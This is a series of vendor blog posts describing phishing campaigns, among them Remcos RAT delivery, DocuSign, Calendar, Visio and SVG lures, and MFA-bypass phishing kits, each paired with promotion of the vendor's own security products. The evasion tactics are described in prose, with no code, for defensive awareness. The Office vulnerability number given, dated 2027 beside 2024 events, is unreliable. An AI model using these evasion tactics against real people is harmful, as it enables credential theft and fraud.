Advances in AI technology have made these highly targeted phishing campaigns much easier to conduct. AI tools greatly reduce the amount of human effort required and that has opened up these targeted campaigns to a much broader range of cybercriminals. AI tools can be used to craft perfect phishing emails that closely mimic the companies and brands they spoof, making identification difficult. AI tools are also being used to analyze online profiles to gather personal information to be included in phishing emails, massively reducing the time required to construct the perfect scam email.

AI tools can also be used to assess online interactions by a particular individual to find out topics the individual is likely to respond to. They can rapidly ingest large amounts of data to craft phishing lures closely mimicking the style of emails written by a particular company or individual, making the spoofing almost impossible for individuals to distinguish from genuine communications. With the tools to gather a wealth of personal information and create flawless emails on appropriate topics, business email compromise scams have become much easier and can be conducted by a broader range of cybercriminals. The consequences of falling for one of these scams can be severe.

To combat these advanced phishing campaigns, businesses need advanced defenses. It is important to ensure that all members of the workforce receive ongoing security awareness training, including the C-suite as they are often the people being targeted in these campaigns. However, given the quality of these phishing attempts, security awareness training and a standard spam filter appliance will not cut it. For many years, spam filters have relied on blacklists of IP addresses and domains that have been previously identified as malicious or have low trust scores, along with antivirus engines for malware detection, and scans of message content for phrases commonly associated with spam and phishing. These spam filters will catch the majority of spam and bulk phishing emails, but will not detect the more sophisticated, AI-generated threats.

Advanced email security solutions are now a necessity. The latest anti-spam software and cloud based anti-spam services incorporate AI and machine learning-based detection in addition to the standard spam filtering methods, such as the engine at the heart of TitanHQ’s SpamTitan and PhishTitan M365 anti-phishing solutions. In recent independent tests by VirusBulletin, TitanHQ’s SpamTitan Skellig engine scored joint first place for detection in the Q3, 2024 tests and first place in Q4, achieving a 100% phishing detection rate with a 0.00% false positive rate and a 100% malware catch rate. Whether you are a business looking to improve your defenses or a managed service provider looking to provide more advanced security to your clients, give the TitanHQ team a call to find out more about getting the right tools in place to counter these advanced phishing threats.

Remcos RAT Infections of the Rise as Threat Actors Adopt New Phishing Tactics

Detections of the Remcos remote access trojan (RAT) have increased recently with threat actors adopting new tactics to deliver this popular commercially available malware. The Remcos RAT is offered under the malware-as-a-service model, where purchasers can use the malware to remotely control infected devices and steal sensitive data.

The Remcos RAT is primarily delivered via phishing emails with malicious attachments, with each of the two main variants delivered using distinct methods. One of the variants is distributed in phishing emails using Microsoft Office open XML attachments that exploit a Microsoft Office memory corruption remote code execution vulnerability (CVE-2027-11882) to execute an embedded script that downloads an intermediate payload that will in turn deliver the Remcos RAT. The vulnerability does not affect newer Office versions, such as Microsoft 365, only older versions prior to Office 2016.

Lures commonly used include fake purchase orders, where the email claims to include purchasing specifications in the attached Excel file. If opened, the spreadsheet is blurred and the user is told the document is protected, and to enable editing to view the file. In the background, the vulnerability is exploited to deliver and execute an HTA file, triggering the processes that lead to the installation of the Remcos RAT. When delivered, the Remocos RAT is injected into a legitimate Windows executable (RegAsm.exe).

The second variant uses a VBS attachment with an obfuscated PowerShell script to download files from a remote server and inject code into RegAsm.exe. Since the final payload is injected into legitimate Windows processes, the malware is often not detected by security solutions. Once installed, persistence is maintained via registry modifications to ensure the malware remains active after a reboot. Lures used to deliver this variant include payment confirmations, with details included in the attached DOCX file.

The highest number of infections have occurred in the United States and India, and there has been a sharp rise in infections in recent months showing that the campaigns are proving effective. A combination of technical measures and security awareness training will help to prevent Remcos RAT infections. Phishing campaigns such as this show why it is important to stay on top of patching and ensure that all systems are kept up to date, and to migrate from software that has reached end-of-life to supported software versions. Endpoint security software is important; however, detection of the Remcos RAT can be difficult since files are not written to the hard drive.

The primary defense is an advanced email security solution. SpamTitan, TitanHQ’s spam filtering service, is an ideal choice as it includes reputation checks, SPF, DKIM, & DMARC, machine-learning algorithms to identify anomalies in emails, and email sandboxing, where attachments are sent for extensive analysis including pattern filtering. In recent tests by VirusBulletin, the engine that powers SpamTitan scored highest out of all 11 tested email security solutions, with a 100% malware and phishing catch rate.

It is important to keep the workforce up to date on the latest security threats and to teach and reinforce security best practices. The SafeTitan security awareness training platform makes this easy for businesses and MSPs, allowing effective security awareness training programs to be created that are tailored to individuals and user roles. The training can be automated to be delivered regularly to employees, as can phishing simulations using the SafeTitan phishing simulator to test the effectiveness of training. Businesses with Microsoft 365 would benefit from the PhishTitan platform. Based on the same engine that powers SpamTitan, PhishTitan helps to protect Microsoft 365 environments from the advanced threats that Microsoft fails to block, add banners to emails from external sources and helps security teams rapidly mitigate phishing threats.

DocuSign Phishing Campaign Abuses HubSpot Tools to Attack European Businesses

An ongoing large-scale phishing campaign targets European businesses and attempts to obtain credentials for their Microsoft Azure cloud infrastructure. While businesses in multiple sectors have been attacked, the majority are in the automotive, chemical, and industrial manufacturing sectors. According to an analysis of the campaign by the Unit 42 team, this campaign has targeted at least 20,000 businesses in Europe.

Like many current phishing campaigns targeting companies, the campaign uses DocuSign-themed lures, where the user is asked to review an emailed document, which includes the branding of the company being targeted. If the document is opened, the user is directed via embedded hyperlinks to an online form created using HubSpot’s free online form builder tool. The drag-and-drop form builder allows forms to be created quickly, and in this case, the threat actor has used the free-to-use tool to create a form with a link button to view the document on Microsoft’s secured cloud.

If the button is clicked, the user will be directed to a phishing page that mimics the Office 365 Outlook Web App login page. If credentials are entered in the fake login page – commonly hosted on attacker-controlled .buzz domains – they are captured by the threat actor, who will attempt to login, and then pivot and move laterally to the cloud. A successful login will see the threat actor add a new device to the victim’s account for persistence.

There are several measures that can be taken by businesses to protect against phishing campaigns such as this, starting with an email spam filter to block the initial contact via email. SpamTitan is an advanced cloud-based anti-spam service for blocking email phishing and malware threats. The solution checks inbound messages against up-to-the-minute lists of blacklisted domains, performs SPF, DKIM, and DMARC checks, malware scans, assessments of message headers and content for phishing indicators, and incorporates AI and machine learning algorithms to identify anomalies in message content. Email sandboxing is used to subject messages to in-depth analysis to identify zero day threats. In recent independent testing by VirusBulletin, SpamTitan achieved first place for overall score out of 11 leading email security solutions, blocking 100% of phishing attempts, 100% of malware, and 99.998% of spam email, with a 0.00% false positive rate.

Security awareness training is vital to teach security best practices and make employees aware of threats, including email threats that abuse legitimate services and tools. TitanHQ’s SafeTitan platform allows businesses to quickly create and automate security awareness training programs, tailored for departments, user groups, and individuals, and reinforce training through phishing simulations.  An additional recommended protection is the WebTitan DNS-based web filter, which incorporates URL filtering to prevent users from visiting known malicious websites, incorporating controls to prevent users from downloading malware.

For more information on improving your defenses against phishing, give the TitanHQ team a call today. The full TitanHQ suite of cybersecurity solutions is available on a free trial, with full product support provided throughout the trial.

Google Calendar Abused in Phishing Campaign

Companies in multiple sectors are being targeted in an ongoing phishing campaign involving initial contact via email via Google Calendar-generated meeting invites. This campaign has proven effective, especially when the user recognizes other guests. The campaign has been active throughout December, with at least 1,000 of these phishing emails identified each week, according to Check Point.

The aim of the phishing emails is to trick the recipients into clicking a link in the email or opening a Calendar file attachment (.ics), both of which will send the user to either Google Forms or Google Drawings.  Next, the user is tricked into clicking another link, which could be a support button or a fake reCAPTCHA. A click will drive the user to the scam page, where they will be taken through a fake authentication process that captures personal information, and ultimately payment card information. This campaign could easily be adapted to obtain credentials rather than payment card details, and campaigns in the past that abused Google Calendar have targeted credentials.

An attacker only needs to obtain an individual’s email address to send the calendar invite, and the emails look exactly like a genuine invite for a meeting. Since the legitimate Google Calendar service is used to generate the phishing invites, the emails are generally not blocked by spam filtering services. Since the sender is legitimate and trusted, the emails pass SPF, DKIM, and DMARC checks, guaranteeing delivery.

Depending on the user’s settings, these may be automatically added to the user’s calendar. The threat actor can then trigger a second email by canceling the meeting and has been doing so in this campaign. The cancellation email also includes a hyperlink to a malicious website.

The use of Google Calendar invites in phishing is nothing new. It is effective as it ensures a large number of requests land in inboxes, and Google Calendar will be familiar to most people, considering there are more than 500 million active users of the tool.

There are simple steps to take to block these threats, although the first option will also limit legitimate functionality for genuine invites. To block these attempts, go into Google Calander settings, and in the event settings switch from automatically add invitations to only show invitations I have responded to.  Also, access Gmail settings and uncheck automatically add events from Gmail to my calendar. To avoid disabling the functionality, check the only known individuals setting in Google Calendar, which will generate an alert if the user has had no interactions with an individual in the past.

It is important to have an advanced email security solution that is capable of detecting sophisticated phishing attacks that bypass the standard reputation checks that are present in virtually all spam filtering software – SPF, DKIM, and DMARC. Advanced spam filtering solutions incorporate AI and machine learning capabilities and can detect anomalies in inbound emails and flag them as suspicious or send them for deeper inspection in an email sandbox. In the sandbox, the message can be analyzed for malicious content, including following the link to check the destination URL. While this campaign does not use malware, an email filtering service with email sandboxing will also protect against malware threats.

Meeting invites, calendar invites, and collaboration requests are commonly used in phishing campaigns and are sent from trusted domains that often bypass spam filtering controls, so it is important to cover these types of scam emails in security awareness training. Employees should be made aware that these requests may not be what they seem, even if they have been sent via a legitimate service. Businesses can also gauge how susceptible employees are to these types of scams using a phishing simulator. SafeTitan includes many phishing templates involving invites from legitimate services to allow businesses to incorporate these into their simulations.

Call TitanHQ today for more information on improving your defenses against phishing with the SafeTitan security awareness training platform, SpamTitan email security, and the PhishTitan anti-phishing solution for Microsoft 365.

Threat Actors Adopt Corrupted Word Files for Phishing Campaigns

A new phishing campaign has been identified that uses the novel tactic of attaching corrupted Microsoft Word files to emails. The files themselves do not contain any malicious code, so scans of the attachments by email security solutions may not flag the emails as malicious.

In order to get the recipient to open the email, the threat actor impersonates the HR department or payroll team, as employees will typically open these messages. The attached files have file names related to payments, annual benefits, and bonuses, which employees may open without performing standard checks of the email, such as identifying the true sender of the message. Many employees place a moderate amount of trust in Word files, as if they contain a macro, it should not run automatically if the Word document is opened.

The threat actor relies on the employee’s curiosity to open the file and the way that operating systems handle corrupted files. The file recovery feature of Microsoft Word will attempt to recover corrupted files. The user will be informed that parts of the file contain unreadable content, and the user is prompted to confirm if they would like the file to be recovered. The documents have been crafted to ensure that they can be recovered by Word, and the recovery will present the user with a QR code that they are told they must scan to retrieve the document.

The document includes the logo of the company being targeted, and the user does not need to “enable editing” to view the contents of the document, so they may mistakenly believe they are safe. If they scan the QR code using their mobile device, they will be directed to a phishing page where they are asked to enter their Microsoft credentials on a phishing page that is an exact match of the genuine Microsoft login prompt.

Businesses with spam filter software may not be protected as email security solutions often fail to scan corrupted files. For instance, the phishing emails bypass Outlook spam filters according to the researchers at Any.Run who identified the campaign. That means the emails may be delivered to inboxes, especially as the messages do not contain any content in the body of the email indicative of a phishing attempt.

If the user opens the file and scans the QR code, they will switch from their desktop or laptop to their mobile phone. Mobile devices rarely have the same level of security protection, so corporate anti-phishing controls such as web filters will likely be bypassed.

Threat actors are constantly developing new ways to trick employees in their phishing campaigns, which is why it is important to run security awareness training programs continuously, updating the training content with new training material in response to threat actors’ changing tactics. By warning employees about this method, they should recognize the scam for what it is if they receive an email with a corrupted file attachment. That is easy to do with a security awareness training platform such as SafeTitan. New training content can be quickly created and rolled out to all users as part of their monthly allocation of training modules. It is also easy to add this type of threat to the SafeTitan phishing simulator to test how employees respond to this new threat type.

As the researchers demonstrated, Microsoft fails to detect the threat, demonstrating why it is important to bolster your M365 phishing defenses with a third-party solution, such as PhishTitan from TitanHQ. PhishTitan integrates seamlessly with Microsoft 365 to augment protection and catches the phishing threats that Microsoft misses. PhishTitan will also add a banner to all inbound emails that come from external sources, giving users a clear flag that these emails are not genuine. The HR department and payroll have internal email addresses.

An email security solution with email sandboxing is also advisable for deep inspection of file attachments, including the ability to read QR codes. Spam filters for incoming mail should also have machine learning and AI-based detection capabilities for identifying emails that deviate from the messages typically received by the business.

All of these features are part of TitanHQ’s email security suite. Give the team a call today to find out more.

Protect Your Business Against Holiday Season Cyber Threats

Holiday season officially started the day after Thanksgiving in the United States, or Black Friday as it is now known. Taking its name from a term used by police officers in Philadelphia to describe the chaos in the city caused by the deluge of suburban shoppers heading to the city to do their holiday shopping, it has become a day when retailers offer bargains to entice the public to buy their goods and services. While the jury is still out on how good many of those bargains are, the consensus is that there are bargains to be found in stores and online, with the official day for the latter being the Monday after Black Friday – Cyber Monday.

The holiday season for shoppers is boom time for cybercriminals who take advantage of the increase in online shoppers looking to buy gifts for Christmas and pick up a bargain of two. Many people time major purchases to take advantage of Black Friday and Cyber Monday offers and cybercriminals are poised to pounce on the unwary. The losses to scams over the holiday period are staggering. According to the Federal Bureau of Investigation (FBI), more than $73 million was lost to holiday season scams in 2022; however, the true total is likely to be considerably higher since many losses go unreported. Those figures do not include the losses to phishing, malware, ransomware, BEC attacks, and other cyberattacks that occur over the holiday period. For instance, the surge in ransomware attacks over Thanksgiving weekend and Christmas when the IT staff is spread thin.

Given the heightened risk of scams and cyberattacks over the holiday season, consumers should be on their guard and take extra care online and ensure that vendors are legitimate before handing over their card details and double-checking the legitimacy of any email requests. While consumers face elevated risks during the holiday season, so do businesses. There are end-of-year deadlines to meet and it’s a short month with many workers taking annual leave over Christmas and the New Year. As the year draws to a close it is common for vigilance to slip, and threat actors are ready to take advantage. Businesses need to ensure that their defenses are up to scratch, especially against phishing – the most common initial access vector in cyberattacks – as a slip in vigilance can easily lead to a costly cyberattack.

Businesses can take several proactive steps to ensure they are protected against holiday season cyber threats, and conducting a security awareness training session is a good place to start. Employees should be reminded about the increase in malicious cyber activity over the holiday period and be reminded about the risks they may encounter online, via email, SMS, instant messaging services, and the phone. With TitanHQ’s SafeTitan security awareness training platform, it is easy to spin up training courses for employees to remind them to be vigilant and warn them about seasonal and other cyber threats. The training platform makes it quick and easy to create and automate training courses, with the training delivered in modules of no more than 10 minutes to ensure employees can maintain concentration and fit the training into their workflows. The SafeTitan platform also incorporates a phishing simulator, which businesses can use to reinforce training and identify individuals who are fooled by phishing scams and ensure they receive the additional training they need.

Due to the high risk of phishing attacks, it is a good idea to implement an advanced spam filter service, one that reliably identifies and neutralizes phishing and business email compromise attempts and provides cutting-edge protection against malware. You need look no further than SpamTitan for that protection. SpamTitan incorporates machine learning and AI-based detection capabilities for detecting phishing, BEC, and scam emails, and dual antivirus engines and email sandboxing for detecting malware threats, including novel malware variants. In Q3, VirusBulletin’s tests of SpamTitan confirmed a phishing detection rate of 99.99% and a malware catch rate of 99.511%. The interim figures for November 2024 are a 100% phishing catch rate and a 100% malware catch rate, demonstrating the reliability of TitanHQ’s cloud-based email filtering solution.

TitanHQ also offers online protection through the WebTitan DNS filter, which prevents access to known malicious websites, blocks malware downloads from the Internet, and can be used to control the web content employees can access, providing an important extra layer of security against web-based threats. At TitanHQ we hope you have a happy holiday period and above all else that you are well protected against cyber threats. Give the team a call today to find out more about how we can help protect your business this holiday season and beyond.

Phishing Campaign Targets Law Firms by Impersonating U.S. Federal Courts

A phishing campaign has been identified that targets law firms by impersonating U.S. federal courts and purports to contain an electronic notice of court filings. Like many similar campaigns in recent months, the campaign aims to trick law firm employees into downloading malware that provides the threat actor with persistent access to the law firm’s network.

Threat actors often target businesses, but a far more effective use of their time and resources is to target vendors. If a threat actor gains access to a vendor’s network, they can potentially use the vendor’s privileged access to attack all downstream clients. Even when a vendor does not have privileged access to client networks, they are likely to store large amounts of data from multiple clients. In the case of law firms, that data is highly sensitive and easily monetized. It can be easily sold on darknet marketplaces and be used as leverage to extort the law firm and its clients.

Over the last few years, law firms have been extensively targeted by threat actors for this very reason. According to a 2023 report from the UK’s National Cyber Security Centre, 65% of law firms have been a victim of a cyber incident and a 2024 report from the chartered accountancy firm Lubbock Fine indicates cyberattacks on law firms have increased by 77% year-over-year. The main motivation for these attacks is extortion and ransomware attacks. There has also been a surge in business email compromise (BEC) attacks on law firms, as they are typically involved in large financial transactions that threat actors can try to divert to their own accounts.

One of the latest campaigns seeks persistent access to the networks of law firms by tricking the firms into installing malware. The campaign came to light following multiple complaints about fake notices of electronic court filings, which prompted the U.S. federal judiciary to issue a warning to U.S. lawyers to be alert to email notifications that purport to be notifications from the courts. The emails impersonate the PACER case management and electronic case files system, and instruct the recipient to respond immediately. The judiciary advised law firms to always check the federal judiciary’s official electronic filing system and never open attachments in emails or download files from unofficial sources.

The intercepted emails impersonate lower courts and prompt the recipient to click an embedded hyperlink to access a document from a cloud-based repository. Clicking the link directs the user to a malicious website where they are prompted to download a file. Opening the file triggers the installation of malware that will give the threat actor the access they need for an extensive compromise. The campaign will undoubtedly result in the theft of sensitive data and attempted extortion.

Most law firms will be well aware that they are prime targets for threat actors and the importance of implementing robust cybersecurity defenses. Since phishing is the most common way that threat actors get access to their networks and sensitive data, it is vital for law firms to ensure that they have an effective email security solution – one that is capable of detecting and blocking malware and correctly classifying phishing and BEC emails. This is an area where TitanHQ can help. TitanHQ offers a suite of cutting-edge cybersecurity solutions that provide multiple layers of protection against the most common attack vectors.

The primary defense against phishing and BEC attacks is anti-spam software, which TitanHQ can provide as a cloud-based anti-spam service or virtual anti-spam appliance that can be installed on-premises on existing hardware. The SpamTitan solution incorporates dual anti-virus engines and email sandboxing for detecting malware and malicious code in email attachments, even zero-day malware threats. The solution has machine learning capabilities for detecting novel email threats such as phishing and BEC attacks that are needed to detect and block the latest AI-generated threats. In independent tests by Virus Bulletin in November 2024 on 125,000 emails, SpamTitan had a 100% malware and phishing catch rate and only miscategorized 2 benign spam emails.

It is also important to ensure that all lawyers and support staff are made aware of the latest threats and receive regular cybersecurity awareness training. TitanHQ offers a comprehensive security awareness training platform (SafeTitan) and phishing simulator that makes it easy to create effective, ongoing training programs that incorporate training material on the latest threats. Give the TitanHQ team a call today for more information on these and other cybersecurity solutions and for advice on improving your cybersecurity defenses against the most common attack vectors.

Phishing Campaign Uses Visio File Attachments for Credential Theft

A new phishing scam uses Microsoft Visio files to bypass phishing defenses to steal Microsoft 365 credentials. Microsoft Visio is a diagramming and vector graphics application used to create a variety of diagrams, including building plans, data flow diagrams, organizational charts, and flowcharts. While the software is widely used by businesses, Visio files are unlikely to feature heavily in security awareness training courses as they are not commonly used in phishing campaigns or for malware delivery. Security awareness training tends to focus on the most common file types such as documents, spreadsheets, and executable files. Unfamiliarity with the file type should mean employees exercise extreme caution; however, since Visio is part of the Microsoft 365 family, the files may be trusted and opened.

To increase the chance of that, this campaign uses compromised accounts to send the phishing emails. By using trusted accounts there is less chance of the emails being identified by email security solutions as malicious since emails are likely to pass reputation and authentication checks. It also increases the chance of emails being opened, as employees are trained to be suspicious of emails from unknown senders and generally trust emails from known senders. Like countless other phishing campaigns, tried and tested lures are used to get the recipient to open the attached .vsdx file. In this campaign the phishing emails masquerade as a purchase order and business proposals. Also observed in this campaign is the use of an Outlook message attachment, with that message including the malicious Visio file. Some emails use hyperlinks instead which direct the recipient to a SharePoint page hosting the Visio file. The latter helps to ensure that the email message is not blocked by email security solutions, which typically trust SharePoint URLs.

If the Visio file is opened, the user will be presented with branding that makes the file appear legitimate and they are advised to click an embedded link to view the contents of the file. The user is told to hold down the CTRL key when they click the link – an additional measure for evading security solutions. That link directs the user to a URL that hosts a spoofed login page that prompts them to enter their Microsoft credentials, which are captured by the threat actor.

While the use of Visio files for phishing is not common, there has been an increase in the use of these files as threat actors look for more reliable methods of phishing. It is certainly worthwhile ensuring that these file types are covered in your security awareness training programs and phishing simulations. While it is important to train employees to be aware of the latest tactics, techniques, and procedures used by threat actors to steal credentials, having an advanced email security solution in place can ensure that these malicious emails do not reach their targets. One of the easiest ways to block the threat, given that these are not commonly used files, is to configure your spam filter to block/quarantine emails containing .vsdx attachments, and certainly to do so for users who do not need to use these file types for work purposes. This is straightforward with SpamTitan (see our Help section).

If it is not practical to block these file types, SpamTitan does incorporate a variety of safeguards for preventing the delivery of malicious messages, including email sandboxing for deep analysis of file attachments to identify malicious URLs (and malware) and machine learning to identify emails that deviate from the messages typically received by the user/business. These features are critical, since the messages in this campaign are sent from compromised email accounts that are potentially trusted.

If you are not a SpamTitan user, give the TitanHQ team a call to find out more about the solution and why so many businesses are switching to SpamTitan for email security and check out this post, which highlights SpamTitan’s 100% malware and phishing block rate in recent tests.

SVG Image Files Being Used for Phishing and Malware Delivery

Cybercriminals are increasingly leveraging SVG files in their email campaigns. These file attachments have been used as part of convincing campaigns that have fooled many end users into disclosing their credentials or installing malware.

SVG files, or Scalable Vector Graphics files to give them their full name, differ from standard image files such as BMP, JPG, and PNG files. Vector graphics are constructed using mathematical formulas that establish points on a grid, rather than specific blocks of color (pixels). The advantage of vector graphics files is that they can be scaled infinitely with no loss of resolution, something that cannot be done with pixel-based images. Vector files are often used for logos, as they can be scaled up easily to be used in billboards with no loss of resolution, and they are increasingly being used on the web as the images will display correctly regardless of the size of the browser window or screen.

SVG is an incredibly versatile file format that can incorporate elements other than the image code, for instance, SVG files can be used to display HTML. It is possible to create an SVG image file that incorporates HTML and executes JavaScript on loading, redirecting users to a malicious website such as a phishing landing page. Images can be created that incorporate clickable download buttons, which will download payloads from a remote URL. An end user could easily be tricked into downloading a file with a double extension that appears to be a PDF file but is actually a malware executable.

Some of the recently intercepted phishing emails have included an SVG file that displays an image of an Excel spreadsheet. Since the spreadsheet is an image, the user cannot interact with it, but it includes an embedded form that mimics the Microsoft 365 login prompt. If the user enters their credentials into that form, they are transmitted to the threat actor. One of the problems with this type of file format is it is not generally blocked by anti-spam software, so is likely to be delivered to inboxes.

While SVG and other vector graphics file formats are invaluable for design and can be found extensively on the web, they are not generally used for image sharing, so the easiest way to protect against these malicious campaigns is to configure your spam filtering service to block or quarantine emails containing SVG file attachments, at least for employees who do not usually work with these file formats. If you have a cloud-based anti-spam service that incorporates email sandboxing, where attachments are sent for deep analysis, it is possible to detect SVG files that incorporate malicious JavaScript. Since the use of these file formats is increasing, it is important to make your employees aware of the threat through security awareness training. Emails with SVG file attachments should also be incorporated into your phishing simulations to determine whether employees open these files. Both are easy with the SafeTitan security awareness training and phishing simulation platform.

DocuSign Abused in Massive Phishing Campaign

A large-scale phishing campaign has been identified that abuses the e-signature software DocuSign, a hugely popular software solution used to legally and securely sign digital documents and eliminate the time-consuming process of manually signing documents.

DocuSign uses “envelopes” to send documents to individuals for signing. These document containers may contain one or more documents that need to be signed, and the envelopes are sent via email. In this campaign, a bad actor abuses the DocuSign Envelopes API to create fake invoices, which are mass-distributed via email. This campaign aims to get the recipient of the invoice to sign it using DocuSign, then the signed document can be used for the next phase of the scam, which typically involves sending the signed document to the billing department for payment, which may or may not be through DocuSign. The invoices generated for this campaign are based on legitimate DocuSign templates and are generated through a legitimate DocuSign account. The invoices include legitimate branding for DocuSign and the company/product the threat actor is impersonating – such as Norton Internet Security, PayPal, and other big-name brands.

The problem for businesses with this campaign is the emails are sent from the genuine docusign[.]net domain, which means email security solutions are unlikely to block the messages since the domain is trusted. Since the emails appear to be legitimate invoices with genuine branding and the correct invoice amount for the product being spoofed, end users are likely to be tricked by the emails. The tactics used in this campaign are similar to others that have abused legitimate cloud-based services to bypass email security solutions, such as sending malicious URLs in documents hosted on Google Docs and Microsoft SharePoint.

The primary defense against these campaigns is security awareness training. Businesses need to make their employees aware of campaigns such as these messages, which often bypass email security solutions and are likely to land in inboxes since they may not contain any malicious URLs or malware code and are sent from a legitimate, trusted domain. The workforce needs to be trained on cybersecurity best practices and told about the red flags in emails that are indicative of a scam. Training needs to be provided continuously to make employees aware of the latest scams, as bad actors are constantly refining their tactics, techniques, and procedures, and developing new ways to trick end users. The easiest way to do this is with a comprehensive security awareness training solution such as SafeTitan.

SafeTitan makes it easy to create training programs for different roles in the organization and automate these training programs to ensure training content is delivered in manageable chunks, with new content added and rolled out in response to the latest threats. These training programs should be augmented with phishing simulations. An email security solution with AI and machine-learning capabilities is also important, as standard spam software is not effective at identifying threats from legitimate and trusted cloud services. TitanHQ’s PhishTitan solution for Microsoft 365 has these capabilities and identifies the phishing emails that Microsoft often misses. PhishTitan scans inbound messages for malicious content, uses email sandboxing for detecting zero-day threats, adds banners to emails from external sources, and allows security teams to rapidly remediate identified threats throughout the entire email environment. In November 2024, Virus Bulletin assessed the engine that powers the SpamTitan spam filtering service and PhishTitan anti-phishing solution using around 125,000 emails. SpamTitan and PhishTitan blocked 100% of malware and 100% of phishing emails and only miscategorized 2 benign spam emails, demonstrating how effective these solutions are at blocking malicious emails.

For more information on improving your defenses against malicious email campaigns through cutting-edge email security and security awareness training, give the TitanHQ team a call today.

Multifactor Authentication Can Give a False Sense of Security

It is all too easy to place too much reliance on multifactor authentication (MFA) to protect against phishing attacks. In theory, if an employee is duped by a phishing email and their credentials are stolen, MFA should stop the threat actor from using those credentials to access the account, as they will not have the necessary additional authentication factor(s). The reality is somewhat different. While MFA can – and does – block many attacks where credentials have been obtained, it is far from infallible. MFA has made it much harder to compromise accounts but, in response, threat actors have developed new tactics to bypass MFA protections.

For example, there is a scam where an employee is contacted by an individual who claims to be from their IT department. The scammer tells them there is an issue with their account and they need to update their password. They are directed to a site where they are prompted to enter their password and enter the MFA code sent to their phone. The threat actor uses that information in real-time to access their account. Multiple campaigns have targeted IT helpdesk staff, with the threat actor impersonating an employee. They provide information to verify their identity (obtained in an earlier phase of the campaign) and ask to register a new device to receive their MFA codes.

Phishing-as-a-service toolkits (PhaaS) capable of defeating MFA are advertised on hacking forums and Telegram channels that can be purchased or rented. They involve an adversary-in-the-middle (AitM) attack and use a reverse proxy between the victim and the legitimate portal for the credentials being sought. The user is directed to a login page that appears exactly as expected, as the user is logging into the genuine site. What is unknown to the user is the attacker sits between them and the site and captures credentials and the session cookie after MFA is successfully navigated. The attacker then has access to the account for the duration of the session cookie and can register a new device to receive future codes.

PhaaS kits are a serious threat and are proving popular with cybercriminals. Take the Rockstar 2FA kit for example, which is advertised for $200 for a 2-week subscription. The kit includes everything a phisher needs, including MFA bypass, login pages for targeting specific credentials, session cookie harvesting, undetectable malicious (FUD) links and link redirectors, a host of phishing templates, and an easy-to-use admin panel that allows tracking of phishing campaigns. The phishing URLs available are also hosted on legitimate services such as Google Docs Viewer, Microsoft OneDrive, and LiveAgent – sites commonly trusted by email security solutions. This is just one phishing kit. There are many being offered with similar capabilities.

The take-home message is that MFA, while important, can be bypassed. For maximum protection, phishing-resistant multifactor authentication should be used – e.g. smartcards or FIDO security keys. These MFA tools can be expensive to implement, so at the very least ensure that you have some form of MFA implemented and implement several other layers of defenses. An advanced spam filtering service such as SpamTitan is essential, as it can block phishing emails to ensure they do not reach end users. Review sites often rate SpamTitan as one of the best spam filters for business due to how easy the solution is to use and its excellent detection rate. In November 2024, in tests by Virus Bulletin, SpamTitan blocked 100% of malware and 100% of phishing emails out of a test involving around 125,000 messages. Previous assessments had a catch rate of more than 99.99%, demonstrating the reliability and accuracy of the solution.

Another layer of protection can be provided by a web filter, which will block attempts to visit known malicious websites, such as those used for phishing and malware distribution. WebTitan provides time-of-click protection, as does TitanHQ’s PhishTitan product – an anti-phishing solution specifically developed to protect M365 accounts against phishing by augmenting Microsoft’s controls to catch the phishing emails that EOP and Defender miss.

Technical defenses are important, but so too is workforce training. Through regular security awareness training and phishing simulations, employees can be taught cybersecurity best practices and how to identify and avoid scam emails. If you want to improve your defenses against phishing and malware, give the TitanHQ team a call and have a chat about your options. All TitanHQ solutions are easy to use, are available on a free trial, and full product support is provided during that trial.

Watch Out for Holiday Season & Black Friday Scams

As consumers wait patiently for Black Friday to snaffle a bargain or two, scammers are hard at work perfecting their Black Friday scams and getting ahead of the game by offering amazing deals via email. In the run-up to Black Friday, Cyber Monday, and throughout the holiday season, everyone should be wary of scams and spam emails. The superb offers and hugely discounted prices are not always what they seem. Most are scams.

There are Black Friday and Cyber Monday deals aplenty, with bricks and mortar and online retailers vying to get your business to kick start the holiday season shopping bonanza. Rather than being confined to the weekend, many retailers have offers over an extended period, and marketing for those deals starts well in advance. Black Friday deals seem to be taking over much of November. While there are bargains to be had, even the incredible prices being offered by genuine retailers may not be quite as good as they seem. While Black Friday deals are touted as being the lowest prices of the year, research suggests that is not necessarily the case. According to the consumer group Which? it is common for prices to be inflated in the run-up to Black Friday to make the discounts seem bigger, and in some cases, the price that a retailer claims a product has been reduced from has never been offered in the previous 12 months. It pays to do some research before you buy.

As far as online shopping goes, it is important to visit your favorite retailers’ websites directly and, as a general rule of thumb, never respond to any offers received by email by clicking links. If you get an email from a retailer advising you of a Black Friday deal, visit their website using your bookmark or by typing in the URL. If the offer is available it should be detailed on the website. This is important as the majority of Black Friday emails are scams. According to a recent analysis by Bitdefender – the company that powers the SpamTitan email sandbox – 77% of Black Friday-themed spam were scams, a 7% increase from 2023. Many of these scam emails impersonate big-name brands and offer impressive but fake discounts on products and services. They often lead to financial loss, data theft, and malware infections.

Black Friday scams include offering top-name brands at heavily discounted prices, but actually mailing cheap counterfeit goods or not mailing any product at all. Big-name brands have been impersonated in spam emails that include an attachment that purports to be a shipping confirmation, confirming that orders are ready for shipment when the attachments direct users to websites where they are asked to disclose their credentials or the attachments install malware.

At this time of year there is a surge in survey scams, where consumers are asked to take part in surveys in exchange for a discount or voucher, and after completing the survey are asked to disclose sensitive information that can be used directly for fraud or spear phishing campaigns.  If you receive unwanted marketing communications from genuine retailers, you can use the unsubscribe option to update your preferences, but make sure you carefully check the destination of the unsubscribe button and the sender’s email address to confirm the communication is from a legitimate retailer.

If you receive spam emails, the unsubscribe option should be avoided. Using the unsubscribe option lets the scammer know that the account is active, and all that is likely to happen is you will receive even more spam. Far better is to mark the email as spam and block the sender. Clicking an unsubscribe option in an email may direct you to a site where a vulnerability is exploited to download malware.

Businesses should ensure they have an effective spam filter, and it is never more important than in November, December, and January when spammers are highly active. At TitanHQ, we offer products that provide exception protection against spam, scams, phishing emails, and malware. In recent independent tests by VirusBulletin, the engine that powers the SpamTitan spam filtering service and the PhishTitan anti-phishing solution for Microsoft 365 achieved a 100% phishing catch rate, a 100% malware catch rate, and a spam catch rate in excess of 99.9% in November 2024 results. These follow overall scores in excess of 99.99% for blocking spam, phishing, and malware earlier in the year, demonstrating these email security products provide excellent and reliable protection against malicious and spam emails.

TitanHQ Achieves 100% Phishing and Malware Catch Rate in November

TitanHQ is thrilled to announce that the engine that powers its email security solutions – SpamTitan and PhishTitan – achieved an incredible 100% catch rate for phishing emails and malware in November 2024 in independent tests by Virus Bulletin.

